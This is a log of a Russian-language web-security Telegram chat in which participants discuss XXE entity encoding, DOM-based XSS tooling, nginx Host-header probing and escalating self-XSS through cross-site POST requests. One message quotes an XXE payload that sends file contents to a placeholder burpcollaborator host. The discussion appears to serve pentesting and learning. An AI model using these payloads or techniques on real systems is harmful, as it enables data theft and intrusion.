Size: a a a

2020 March 31

NM

Never Mind in WebPwnChat
О, спасибо
источник

N

Nikolay in WebPwnChat
Never Mind
social engineering toolkit, kali2020
Не знаю актуально или нет, была такая проблема после обновы где-то в январе 2020. Если ты погуглишь, это проблема конкретной версии SE (Ишуюсы на гитхабе), для фикса нужно вручную поправить было что-то в одном из файликов (Сейчас, наверно, можно просто обновиться)
источник

N

Name in WebPwnChat
Iframe 0x01
Госпади я хоть и не кодер но это выглядит как то ужасно , пробовал в urlencode? И вот так не выйдет ""><br>, не понимаю зачем перенос строки тебе?
Это функция применяется к чату, во время добавления сообщений, так что urlencode тут вряд-ли поможет
источник

NM

Never Mind in WebPwnChat
Nikolay
Не знаю актуально или нет, была такая проблема после обновы где-то в январе 2020. Если ты погуглишь, это проблема конкретной версии SE (Ишуюсы на гитхабе), для фикса нужно вручную поправить было что-то в одном из файликов (Сейчас, наверно, можно просто обновиться)
не, сделал апдейт не решилось в 2020, в 2019 норм работает. Ну мне не принципиально.
источник
2020 April 01

᠌᠌Sh1Yo in WebPwnChat
источник

w

whoami in WebPwnChat
❗️У Mail.ru сбой в России — данные Downdetector
источник

I

Ivan in WebPwnChat
охладите ваши интрудеры
источник

d

dd in WebPwnChat
читаю портсвиггер и не могу понять, в каких случаях применяется знак %, а в каких &#x25 в таком контексте:

<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/?x=%file;'>">
источник

k

killinem in WebPwnChat
dd
читаю портсвиггер и не могу понять, в каких случаях применяется знак %, а в каких &#x25 в таком контексте:

<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/?x=%file;'>">
Там где &#x25 эта сущность описана в кавычках, соответственно если не заэнкодить, символ % будет восприниматься не как управляющий символ для обозначения parameter entity, а как обычный символ процента, и поэтому нужно энкодить
источник

k

killinem in WebPwnChat
Парни, а кто как тестит на наличие dom based xss? Есть норм инструменты автоматизирующие? Или вариант только вручную ковырять все js файлы в поисках sources и sinks?
источник

GD

Green Dog in WebPwnChat
killinem
Парни, а кто как тестит на наличие dom based xss? Есть норм инструменты автоматизирующие? Или вариант только вручную ковырять все js файлы в поисках sources и sinks?
был доминатор, на его место пришёл blueчтото там, есть ещё какой-то сканер - https://sboxr.com/
источник

GD

Green Dog in WebPwnChat
Самые простые штуки, бурп и окунь точно могут детектить
источник

d

dd in WebPwnChat
killinem
Там где &#x25 эта сущность описана в кавычках, соответственно если не заэнкодить, символ % будет восприниматься не как управляющий символ для обозначения parameter entity, а как обычный символ процента, и поэтому нужно энкодить
то есть если я объявляю одну сущность, которая содержит в себе объявление другой сущности, то символы всегда должны энкодится? просто не понимаю пчм без энкода процент будет просто процентом, а не управляющим символом
источник

КР

Криптослав Рутовски in WebPwnChat
Забавную штуку нашел.
Если сидеть в одной подсети с организацией и запросить /nginx_status, то возвращается 200 с лендосом.

Если подменить host на localhost/127.0.0.1, то возвращается 403.

Если с другого IP, то на любой host, кроме основного возвращается 400.

Если в хост прописать один из поддоменов, то получу 301.

Есть идеи как можно еще поиграться с openresty+nginx ?
источник

M

Mykola in WebPwnChat
Ребята, кто-то видел кейсы когда розкручивали self-xss через post запрос c csrf-token до good xss?
источник

B

Bo0oM in WebPwnChat
1) Если можно через post, почему это self?
2) А где ты возьмешь csrf-токен?)
источник

RD

Rotten Doritos in WebPwnChat
Bo0oM
1) Если можно через post, почему это self?
2) А где ты возьмешь csrf-токен?)
self видимо потому, что нужно руками взять csrf токен)
источник

M

Mykola in WebPwnChat
Bo0oM
1) Если можно через post, почему это self?
2) А где ты возьмешь csrf-токен?)
1) Self потому что только если отправить POST запрос можно увидеть XSS. И XSS могу увидеть только я.
2) Хм, наверное только подготовить зарание запрос как-то.
источник

B

Bo0oM in WebPwnChat
>Self потому что только если отправить POST запрос можно увидеть XSS. И можно увидеть его могу только я.

А если бы xss была в ссылке, можно было отправить GET запрос, и увидел бы его только ты!
источник

B

Bo0oM in WebPwnChat
Ты же можешь с собственной страницы отправить POST запрос от лица жертвы (если она эту страницу откроет).
источник